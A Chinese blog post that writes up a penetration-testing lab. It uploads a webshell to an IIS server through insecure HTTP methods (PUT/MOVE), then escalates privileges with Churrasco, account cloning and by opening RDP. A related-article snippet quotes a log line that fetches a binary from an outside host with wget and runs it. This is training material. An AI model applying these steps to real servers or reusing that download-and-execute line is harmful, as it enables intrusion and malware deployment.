WEBSHELL姿势之不安全的HTTP方法(渗透实验)

最新推荐文章于 2024-06-22 09:47:40 发布
最新推荐文章于 2024-06-22 09:47:40 发布
阅读量4.5k 收藏 4
点赞数 1
分类专栏: WEB安全 文章标签: 渗透测试 HTTP方法 windows提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/calmegm/article/details/49401547
版权

前言

Web服务器(以IIS为例)在没有任何设置是,使用OPTIONS命令,可以返回所有能够响应的HTTP方法,如OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK。


实验要求

任务:获取目标机上的两个文件(key1.txt和key2.txt),在C盘的根目录下存储有两个敏感文件(key1.txt,key2.txt)
      提示:
      1、信息收集,对目标机器进行信息收集,这里主要是端口,及服务。
      2、漏洞发现,针对服务(如web服务里面就有apache2,iis..),可以去看看其使用的软件版本是否存在漏洞
      3、利用漏洞,拿到shell,这个时候你应该可以拿到key1.txt了。
      4、权限提升,这个时候你就可以拿到key2.txt了。
0x00 端口扫描
使用metasploit console,执行命令nmap -p 1-65535 10.1.1.191

我们发现80和8889部署了两个应用,分别是dedecms和ewebeditor。
dedecms: 只有一个首页,其余功能都剔除;通过/data/admin/ver.txt发现版本是2014.08.15,网上也无相关的漏洞情况,弃之;
ewebeditor:admin:admin/amdin888默认账户登录失败,打开默认数据库位置db/ewebeditor.mdb,也不存在,弃之;
0x 01 中间件服务
如果是中间件的漏洞的话,一般有解析漏洞(借助上传)、读写漏洞(HTTP方法)等
直接使用工具IIS put scaner测试,发现8889应用存在漏洞

上传菜刀脚本1.txt(无法直接上传asp文件)

通过浏览器的我们也能访问到1.txt,下一步将1.txt转换为脚本,我们通过http的move方法


0x 02 获取key1
通过菜刀连接,我们发现了c盘下的key文件

其中key1是可以直接访问的,key2提示权限问题,那么下一步就是提权的问题
0x 03 提权
使用菜刀虚拟终端,所用命令都拒绝访问,遂上传一个cmd命令至www(该目录可读写)目录下
执行setp c:\www\cmd.exe

之后输入一些whoami等命令,执行正常,但是当输入net user时提示“系统找不到指定文件”,可能是禁用或者是删除了,于是自己上传了一个net.exe上去,依然报错,大概是禁用了,此路不通,于是使用aio工具进行帐号的克隆,上传aio.exe,执行克隆命令

这里还是报错了,料想可能是权限的问题,遂祭上各种提权工具,我们先看一下系统补丁情况:

KB952004、KB956572、KB970483这三个补丁都没打,也就是说pr.exe,Churrasco,iis提权都可以,这里我们使用Churrasco,再次执行克隆

由于系统未开放3389,我们自己上传一个bat文件开一下端口,执行该bat文件也许system权限

我们在本机telnet看一下,可以发现3389端口已经开放,使用帐号guest/p@ssw0rd登录,找到key2.txt,修改以下文件权限,就可以看到内容

至此,实验已经完成,本次实验主要考察两个知识量:HTTP方法及提权,提权的更多内容可参考我转载的一篇web提权的文章。


6um1n
关注
专栏目录
安全HTTP方法
谢公子的博客
05-03 3万+
我们常见的HTTP请求方法是GET、POST和HEAD。但是,其实除了这两个之外,HTTP还有一些其他的请求方法WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Ser...
ActiveMQ漏洞复现(不安全http方法具体利用)
嘻嘻哈哈
06-22 2829
1、搭建ActiveMQ环境 环境准备 jre安装及环境变量的配置: https://blog.csdn.net/tiantang_1986/article/details/53894947 下载有漏洞版本的ActiveMQ(我用的5.7.0) http://activemq.apache.org/download-archives.html 解压后进入bin目录,发...
webshell的一些姿势
LainWith的博客
11-22 5442
目录什么是webshellwebshell姿势实战案例1. 编辑模板拿webshell案例1:wordpress案例2:织梦cms v5.72. 文件上传拿webshell案例1:织梦cms v5.7案例2:南方数据企业系统,后台上传截断拿webshell3. 文件写入拿webshell案例1:织梦cms v5.7案例2:留言一句话到数据库拿webshell4. zip自解压拿webshell案例1:wordpress案例2:pageadmin5. 修改配置文件案例1:一句话插入配置文件拿webshel
探秘put2win:自动化HTTP PUT方法漏洞利用工具
最新发布
gitblog_00084的博客
06-22 284
探秘put2win:自动化HTTP PUT方法漏洞利用工具 put2winScript to automate PUT HTTP method exploitation to get shell项目地址:https://gitcode.com/gh_mirrors/pu/put2win 在网络安全的边缘,有一款强大的开源工具——put2win,正等待着勇敢的探索者来发掘其潜力。这是一款专为自动化...
漏洞挖掘-不安全HTTP方法
weixin_48421613的博客
01-09 3889
如果文件修改失败,则会返回其他状态码,例如 405 Method Not Allowed。如果文件删除成功,服务器会返回 200 OK 状态码;使用 PROPFIND 方法,客户端可以请求服务器上的资源的属性列表,也可以请求具体的属性值。笔者在一次漏洞挖掘的过程中,几乎是习惯性的看了一眼OPTIONS方法,OPTIONS方法很简单,只需要在请求包里直接将GET/POST方法进行替换,即可看到服务器开启了哪些方法。​使用 DELETE 方法时,客户端向服务器发送 DELETE 请求,并指定要删除的资源。
HTTP协议——HTTP方法
热门推荐
vikeyyyy的博客
06-12 1万+
        这里对一些基本HTTP方法进行更为深入的讨论,并不是每个服务器都实现了所有的方法,如果要跟HTTP1.1兼容,那么只要为其资源实现GET方法和HEAD方法就可以了。        即使服务器实现了所有这些方法,这些方法的使用很可能也是受限的,这些限制通常都是在服务器的配置中进行设置的,因此会随着站点和服务器的不同而有所不同。1、GET        GET是最常用的方法,通常用于请...
103.网络安全渗透测试—[权限提升篇1]—[Linux内核漏洞提权]
qwsn
02-15 7252
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、LINUX 内核漏洞提权 1、漏洞背景: 2、漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME类型限制文件上传获取webshell (4)创建交互式shell (5)查看linux发行版 (6)查找可用的提权exp (7)进行提权 (8)切换shell
2023年网络安全岗面试跳槽看这一篇就够了(含面试题+大厂面经分享)
m0_71743066的博客
03-10 1511
又到了一年一度的金三银四面试季,想必有些朋友的心已经开始躁动了,毕竟跳槽涨薪的幅度远高于内部调薪的幅度!以下为网络安全各个方向涉及的面试题以及安全大厂的面经汇总,星数越多代表问题出现的几率越大,祝各位都能找到满意的工作。注:本套面试题及面经,已整理成pdf文档,但内容还在持续更新中,因为无论如何都不可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺,希望对大家有帮助。
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5550
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
雨笋教育干货分享:0day漏洞利用及抓取的姿势
weixin_59086772的博客
08-10 1441
渗透干货又来了,雨笋教育又给大家整理的漏洞复现分析的案例 整个过程仅讲思路的实现,因笔者日常工作并不相关,从构思到实现,前前后后大概花了两个月时间,未对数据进行整理,也未列出具体的步骤,仅供研究与参考,思路如有雷同,那真是太好了 0x01 概念 根据维基百科的解释,在电脑领域中,零日漏洞或零时差漏洞(英语:zero-day vulnerability、0-day vulnerability)通常是指还没有补丁的安全漏洞,而零日攻击或零时差攻击(英语:zero-day exploit、zero-day
内网渗透——红日靶机学习(一)
jammny
11-13 6328
前言 开启内网学习,域渗透之路... 环境搭建 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 内网拓扑: 我选用wmware ESXI进行内网环境搭建,内网搭建如下: WIN7(web服务器):172.26.16.123/192.168.52.143 WIN2008(域控):192.168.52.138 WIN2003(域成员):192.168.52.141 渗透测试 一、外网打点 信息收..
http_put_shell:使用http putcopymove方法上传shell
07-22
http_put_shell 使用http put/copy/move方法上传shell ###using: cmd > cd http_put_shell cmd > python http_put_shell.py
web服务器启用了不安全HTTP方法
bobozai86的博客
09-14 7978
1、什么是不安全HTTP方法 开发人员、运维人员一般可能用于调试服务器,开启了一些客户端能够直接读写服务器端文件的方法,例如:DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK 等HTTP协议支持的方法。 2、安全风险 可能直接通过浏览器直接在Web服务器上上传、修改或删除Web页面、脚本和文件。 3、不安...
HTTP 方法详解
SnailDream
12-27 1394
一、基础篇 所谓HTTP请求方法就是你提前告诉服务器你要进行什么类型的操作,如同你吃饭前先点菜,告诉餐厅要给你准备做什么样的菜。   一共有8个类型的方法   GET HEAD POST PUT DELETE OPTIONS TRACE 扩展方法
获取Webshell的常用方法(一)
Captain_RB的博客
12-03 1万+
Webshell是以php、asp、jsp等网站脚本文件形式存在的一种网页后门,攻击者可以利用web请求的方式,获得webshell,控制网站服务器,进而进行执行命令、上传下载文件等操作。本文主要介绍在渗透测试过程中获取Webshell的基本思路,实战中还需就地取材,灵活应对。
CTF—攻防练习之HTTP—暴力破解
weixin_30642029的博客
06-20 375
攻击机:192.168.32.152 靶机:192.168.32.164 首先nmap,nikto -host ,dirb 扫描开放带端口,探测敏感文件,扫描目录 开放了21,22,80端口,看到一个敏感目录secret 打开发现访问里面界面会跳转 vitcsec,但是打不开,设置一下host gedit /etc/hosts 即可直接访问网页中内容 打开...
【网络安全】 关于http服务器遭受webshell攻击
jn10010537的博客
09-17 3155
windows10】 关于http服务器遭受webshell攻击1、背景2、ip地址查询3、可疑请求ip 1、背景 在阿里云公网上部署web服务器,最近客户反映我的服务经常断掉,查看后台日志,发现境外的IP攻击。 比如: 209.141.56.212 - - [17/Sep/2021 04:52:04] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv
webshell检测方法归纳
计算机科研杂货铺
08-17 4072
背景 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell检测模型 Webshell的运行流程:hacker -> HTTP Protocol -> Web Server -> CGI。简单来看就是这样一个
企业环境渗透实验:爆破、Webshell与内网扫描
本次实验主题为“第6次网安实验1”,主要关注的是网络安全领域中的企业环境渗透,涉及的关键知识点包括Web网站后台风暴、SQL注入、PHPMyAdmin写入Webshell、内网扫描和域控账户密码的获取与利用。实验旨在让学生深入...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值